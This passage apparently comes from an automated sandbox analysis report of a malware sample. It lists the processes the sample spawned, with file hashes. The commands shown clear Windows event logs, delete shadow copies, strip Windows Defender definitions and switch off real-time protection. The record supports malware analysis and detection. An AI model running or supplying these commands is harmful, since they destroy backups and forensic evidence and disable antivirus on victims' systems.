  wevtutil.exe cl system
  - Suspicious use of AdjustPrivilegeToken
  PID:3412

C:\Windows\SysWOW64\wevtutil.exe (level 2)
  wevtutil.exe cl security
  - Suspicious use of AdjustPrivilegeToken
  PID:2104

C:\Windows\SysWOW64\wevtutil.exe (level 2)
  wevtutil.exe cl application
  - Suspicious use of AdjustPrivilegeToken
  PID:1156

C:\Windows\SysWOW64\Wbem\wmic.exe (level 2)
  wmic.exe SHADOWCOPY /nointeractive
  - Suspicious use of AdjustPrivilegeToken
  PID:2160

C:\Windows\SysWOW64\Wbem\wmic.exe (level 2)
  wmic.exe shadowcopy delete
  - Suspicious use of AdjustPrivilegeToken
  PID:2748

C:\Windows\SysWOW64\cmd.exe (level 2)
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  PID:2956

C:\Program Files\Windows Defender\MpCmdRun.exe (level 3)
  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  - Deletes Windows Defender Definitions
  PID:1968

C:\Windows\SysWOW64\cmd.exe (level 2)
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  PID:2732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
  powershell Set-MpPreference -DisableIOAVProtection $true
  - Suspicious behavior: EnumeratesProcesses
  PID:2404

C:\Windows\SysWOW64\cmd.exe (level 2)
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  PID:1088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
  powershell Set-MpPreference -DisableRealtimeMonitoring $true
  - Suspicious behavior: EnumeratesProcesses
  PID:1204
Network
MITRE ATT&CK Enterprise v6
Downloads
- MD5: 1c19c16e21c97ed42d5beabc93391fc5
  SHA1: 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
  SHA256: 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
  SHA512: 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
- MD5: a76ffec12f485544a5f448dfa2e2ab3d
  SHA1: 643a49b8123aa1eac8396a0fbccbfc4d0e989f32
  SHA256: a41bc189778bb2f6c16074c2083c642dc5b7ccc70c4a199e2d38df64c9352ac5
  SHA512: 84135e22fe9dca340280db0ffa28858f2a622ed3f60e74f8197a654dbd4d99d4c285e101c3e4f93162947351ef3940dbfa3b37184d40faa2773acad5bd5e3b27